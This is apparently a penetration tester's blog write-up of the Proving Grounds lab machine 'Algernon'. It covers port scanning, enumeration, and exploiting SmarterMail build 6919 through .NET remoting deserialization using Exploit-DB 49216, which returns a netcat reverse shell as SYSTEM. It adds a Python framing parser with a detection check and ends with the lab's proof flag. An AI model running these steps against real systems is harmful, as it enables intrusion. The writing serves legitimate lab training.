/ z3k0sec's blog
Hacker | Penetration Tester | Security Researcher


19 May 2023

Proving Ground Practice: Algernon


We will exploit the machine via a .NET deserialization attack against SmarterMail's .NET remoting endpoint (port 17001). The public exploit (Exploit-DB 49216) is titled for SmarterMail build 6985; the target runs build 6919 and exposes the same remoting endpoint.

NMAP

As always, we start off with an nmap scan of all TCP ports.

sudo nmap -sC -sV -Pn 192.168.232.65 -p-

21/tcp open ftp Microsoft ftpd


| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 04-29-20 10:31PM <DIR> ImapRetrieval
| 02-17-23 12:38PM <DIR> Logs
| 04-29-20 10:31PM <DIR> PopRetrieval
|_04-29-20 10:32PM <DIR> Spool
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5040/tcp open unknown
9998/tcp open http Microsoft IIS httpd 10.0
| uptime-agent-info: HTTP/1.1 400 Bad Request\x0D
| Content-Type: text/html; charset=us-ascii\x0D
| Server: Microsoft-HTTPAPI/2.0\x0D
| Date: Wed, 17 May 2023 22:36:25 GMT\x0D
| Connection: close\x0D
| Content-Length: 326\x0D
| \x0D
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">\x0D
| <HTML><HEAD><TITLE>Bad Request</TITLE>\x0D
| <META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>\x0D
| <BODY><h2>Bad Request - Invalid Verb</h2>\x0D
| <hr><p>HTTP Error 400. The request verb is invalid.</p>\x0D
|_</BODY></HTML>\x0D
|_http-server-header: Microsoft-IIS/10.0
| http-title: Site doesn't have a title (text/html; charset=utf-8).
|_Requested resource was /interface/root
17001/tcp open remoting MS .NET Remoting services
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:


| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb2-time:
| date: 2023-05-17T22:36:25
|_ start_date: N/A

PORTS

PORT 21: FTP

Since anonymous login is allowed, let’s authenticate via:

ftp anonymous@192.168.232.65

We have access to the four directories already listed by nmap's ftp-anon script: ImapRetrieval, Logs, PopRetrieval and Spool.

The Logs directory contains some log files. Download them via mget * and analyse them. We did not find anything of
use, so let's get out of this potential rabbit hole as soon as possible.

PORT 80: DIRECTORY AND FILES ENUMERATION

ffuf -c -w ~/SecLists/Discovery/Web-Content/raft-medium-directories.txt -u "http://192.168.232.65/FUZZ"

ffuf -c -w ~/SecLists/Discovery/Web-Content/raft-medium-directories.txt -u "http://192.168.232.65/aspnet_client/FUZZ"

v1.5.0
________________________________________________

:: Method : GET
:: URL : http://192.168.232.65/aspnet_client/FUZZ
:: Wordlist : FUZZ: /home/white/SecLists/Discovery/Web-Content/raft-medium-directories.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

[Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 28ms]
system_web [Status: 301, Size: 170, Words: 9, Lines: 2, Duration: 33ms]

After some time enumerating further directories and potential .aspx files, we did not find anything. So let’s move on.

PORT 135: RPC

We tried a null session via rpcclient, but the server responds with an "access denied" message.

PORT 139: SMB

The same happens when we try a null session with crackmapexec's smb module: access denied.

FOOTHOLD + PRIV ESC

PORT 9998: SmarterMail

The only interesting port that stands out is on port 9998. The web application is called “SmarterMail”.

We search for a public exploit on searchsploit / exploitdb:

searchsploit smartermail

Since there are multiple hits, we have to find out which version is running on the server.
Inspecting the web application's source code ("View page source") shows it is running build 6919
(SmarterMail identifies releases by build number, an odd naming convention for versioning).

Mirror the exploit and open it:

searchsploit -m windows/remote/49216.py

Notice that the exploit mentions a .NET remoting endpoint that is vulnerable to a .NET deserialisation attack. Remember
port 17001 from the nmap scan, identified as "MS .NET Remoting services"? That is exactly such an endpoint. Sweet!

Set the variables in the exploit script as follows:

HOST = target machine IP (192.168.232.65)
PORT = .NET remoting endpoint (port 17001)
LHOST = attacker machine IP
LPORT = netcat listening port (9001)

Before we execute the script, set up a netcat handler on port 9001.

nc -lvnp 9001

Once we run the python script via:

python3 49216.py

We receive a connection from the target machine and gain a shell as NT AUTHORITY\SYSTEM.
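To make the remoting part concrete, the following is an added example written for this write-up; it is not 49216.py, nor SmarterMail or SmarterTools code, and it contains no deserialization gadget. It builds and parses the MS-NRTP TCP frame that an endpoint like the one on port 17001 speaks (the envelope any exploit against it has to wrap its serialized payload in), and it checks whether a frame body opens with a BinaryFormatter (MS-NRBF) stream header, which is the cheap test a network sensor can apply on such a port. The byte layouts are as the author of this example understands MS-NRTP and MS-NRBF; the sample URI, the service name in it and the empty NRBF body are constructed for illustration, and the real object URI used by the exploit is not shown on this page.

```python
"""Minimal .NET Remoting TCP-channel framing (MS-NRTP) in pure Python.

Added example for this write-up; it is not 49216.py and carries no gadget
chain. Byte layouts follow the MS-NRTP frame and MS-NRBF stream header as
this example's author understands them; the URI and body below are
constructed, not captured from the Algernon host.
"""
import struct

PREAMBLE = b".NET"                 # ProtocolId at the start of every frame
MAJOR, MINOR = 1, 0                # protocol version 1.0
OP_REQUEST, OP_ONEWAY, OP_REPLY = 0, 1, 2
DIST_NOT_CHUNKED = 0               # content is length-prefixed, not chunked

# Header tokens, the data-type tag each carries, and counted-string encodings
(HDR_END, HDR_CUSTOM, HDR_STATUSCODE, HDR_STATUSPHRASE,
 HDR_REQUESTURI, HDR_CLOSE, HDR_CONTENTTYPE) = range(7)
HEADER_NAMES = {HDR_STATUSCODE: "StatusCode", HDR_STATUSPHRASE: "StatusPhrase",
                HDR_REQUESTURI: "RequestUri", HDR_CLOSE: "CloseConnection",
                HDR_CONTENTTYPE: "ContentType"}
TYPE_VOID, TYPE_COUNTED_STRING, TYPE_BYTE, TYPE_UINT16, TYPE_INT32 = range(5)
STR_UNICODE, STR_UTF8 = 0, 1


class RemotingFrameError(ValueError):
    """Raised when bytes do not parse as a well-formed MS-NRTP frame."""


def _counted_string(s: str) -> bytes:
    data = s.encode("utf-8")
    return bytes([STR_UTF8]) + struct.pack("<I", len(data)) + data


def build_frame(request_uri, body, one_way=False, content_type="application/octet-stream"):
    """Wrap `body` in a Request (or OneWayRequest) frame addressed to `request_uri`."""
    op = OP_ONEWAY if one_way else OP_REQUEST
    head = PREAMBLE + bytes([MAJOR, MINOR]) + struct.pack("<HHI", op, DIST_NOT_CHUNKED, len(body))
    headers = (struct.pack("<HB", HDR_REQUESTURI, TYPE_COUNTED_STRING) + _counted_string(request_uri)
               + struct.pack("<HB", HDR_CONTENTTYPE, TYPE_COUNTED_STRING) + _counted_string(content_type)
               + struct.pack("<H", HDR_END))
    return head + headers + body


def _read_counted_string(buf, pos):
    fmt, n = struct.unpack_from("<BI", buf, pos)
    pos += 5
    raw = buf[pos:pos + n]
    if len(raw) != n:
        raise RemotingFrameError("truncated counted string")
    return raw.decode("utf-16-le" if fmt == STR_UNICODE else "utf-8"), pos + n


def parse_frame(buf):
    """Parse one frame into {'operation', 'headers', 'body'}; reject junk early."""
    if len(buf) < 14 or buf[:4] != PREAMBLE or (buf[4], buf[5]) != (MAJOR, MINOR):
        raise RemotingFrameError("not a .NET Remoting 1.0 frame")
    try:
        op, dist, length = struct.unpack_from("<HHI", buf, 6)
        if dist != DIST_NOT_CHUNKED:
            raise RemotingFrameError("chunked frames are not handled in this example")
        pos, headers = 14, {}
        while True:
            (token,) = struct.unpack_from("<H", buf, pos)
            pos += 2
            if token == HDR_END:
                break
            if token == HDR_CUSTOM:            # Custom: name and value, no type tag
                name, pos = _read_counted_string(buf, pos)
                value, pos = _read_counted_string(buf, pos)
                headers[name] = value
                continue
            dtype = buf[pos]
            pos += 1
            if dtype == TYPE_COUNTED_STRING:
                value, pos = _read_counted_string(buf, pos)
            elif dtype == TYPE_BYTE:
                value = buf[pos]
                pos += 1
            elif dtype == TYPE_UINT16:
                value = struct.unpack_from("<H", buf, pos)[0]
                pos += 2
            elif dtype == TYPE_INT32:
                value = struct.unpack_from("<i", buf, pos)[0]
                pos += 4
            elif dtype == TYPE_VOID:
                value = None
            else:
                raise RemotingFrameError(f"unknown header data type {dtype}")
            headers[HEADER_NAMES.get(token, f"Header{token}")] = value
    except (struct.error, IndexError) as exc:
        raise RemotingFrameError("truncated frame") from exc
    body = buf[pos:pos + length]
    if len(body) != length:
        raise RemotingFrameError("body shorter than ContentLength")
    return {"operation": op, "headers": headers, "body": body}


def looks_like_binaryformatter(body):
    """True if body opens with an MS-NRBF SerializationHeaderRecord: record type
    0x00, RootId, HeaderId, MajorVersion == 1, MinorVersion == 0 (17 bytes).
    BinaryFormatter output is what a remoting deserialization attack carries."""
    if len(body) < 17 or body[0] != 0x00:
        return False
    _root, _hdr, major, minor = struct.unpack_from("<iiii", body, 1)
    return major == 1 and minor == 0


# Constructed sample: NRBF header plus a MessageEnd record (0x0B). An empty stream, not a payload.
SAMPLE_BODY = b"\x00" + struct.pack("<iiii", 1, -1, 1, 0) + b"\x0b"
# Constructed URI; the real SmarterMail object URI is not shown on the page.
SAMPLE_URI = "tcp://192.168.232.65:17001/ExampleService"


def demo():
    parsed = parse_frame(build_frame(SAMPLE_URI, SAMPLE_BODY))
    parsed["binaryformatter"] = looks_like_binaryformatter(parsed["body"])
    return parsed


if __name__ == "__main__":
    print(demo())
```

Chunked content distribution and the exploit's actual payload are out of scope here. On the defensive side the same two checks are what you would run over a capture of port 17001 traffic: a Request frame carrying a RequestUri header and a body that passes looks_like_binaryformatter, from a host that has no business talking remoting to the mail server, is worth an alert.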

proof.txt

Grab the proof.txt flag and we have owned the machine.

PS C:\Windows\system32> cat C:\users\administrator\desktop\proof.txt


9a6c5ae155d06074a9a8ae187b5be566

Tags : [ ms09_050 smb proving_grounds algernon ]
